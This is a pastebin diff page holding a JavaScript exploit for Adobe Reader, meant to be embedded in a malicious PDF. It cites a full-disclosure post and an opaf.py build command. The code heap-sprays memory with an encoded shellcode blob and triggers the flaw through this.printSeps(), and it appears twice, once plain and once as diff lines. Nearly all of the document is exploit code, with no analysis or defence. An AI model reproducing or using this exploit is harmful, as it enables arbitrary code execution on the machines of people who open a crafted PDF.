View difference between Paste ID: <a href="/h9GVyJhQ">h9GVyJhQ</a> and <a href="/post/view"></a>

View difference between Paste ID: h9GVyJhQ and

SHOW: | | - or go back to the newest paste.


/*
http://seclists.org/fulldisclosure/2010/Nov/23
python opaf.py -d -x xpl.xml -g xpl.png xpl.pdf 
png -> http://picpaste.com/xpl-KHwCOXEv.png
js  -> http://pastebin.com/u79NLTwx
xml -> http://pastebin.com/Gu1AKxUw
*/

function exploit() { 
    function sdlfkasdfiasdflaksdflaf(number){ 
        large_hahacode=unescape("%u02ba%u0202%u8002%uffca%u6a42%u5843%ucd52%u5a2e%u053c%uf174%u8042%ufcfa%ueb77%u8fb8%u9050%u4058%u023b%uf075%ue2ff"); 
        var large_heap = unescape("%u1c1c%u0c1c"); 
        while(large_heap.length <=number) 
            large_heap+=large_heap; 
        large_heap=large_heap.substring(0,32768 - large_hahacode.length); 
        memory=new Array();
        for(i=0;i<0x1024;i++) {
            memory[i]= large_heap + large_hahacode; 
        } 
        this.printSeps(); 
    } 

    number=10000; 
    number=number*3+2768; 
    var a=app.viewerVersion; 
    if ((a>=8)||(a<10)) 
        sdlfkasdfiasdflaksdflaf(number) 
    else 
        exit(); 
}

1	-
1	+	/*
2		http://seclists.org/fulldisclosure/2010/Nov/23
3		python opaf.py -d -x xpl.xml -g xpl.png xpl.pdf
4		png -> http://picpaste.com/xpl-KHwCOXEv.png
5		js -> http://pastebin.com/u79NLTwx
6		xml -> http://pastebin.com/Gu1AKxUw
7		*/
8
9		function exploit() {
10		function sdlfkasdfiasdflaksdflaf(number){
11		large_hahacode=unescape("%u02ba%u0202%u8002%uffca%u6a42%u5843%ucd52%u5a2e%u053c%uf174%u8042%ufcfa%ueb77%u8fb8%u9050%u4058%u023b%uf075%ue2ff");
12		var large_heap = unescape("%u1c1c%u0c1c");
13		while(large_heap.length <=number)
14		large_heap+=large_heap;
15		large_heap=large_heap.substring(0,32768 - large_hahacode.length);
16		memory=new Array();
17		for(i=0;i<0x1024;i++) {
18		memory[i]= large_heap + large_hahacode;
19		}
20		this.printSeps();
21		}
22
23		number=10000;
24		number=number*3+2768;
25		var a=app.viewerVersion;
26		if ((a>=8)\|\|(a<10))
27		sdlfkasdfiasdflaksdflaf(number)
28		else
29		exit();
30		}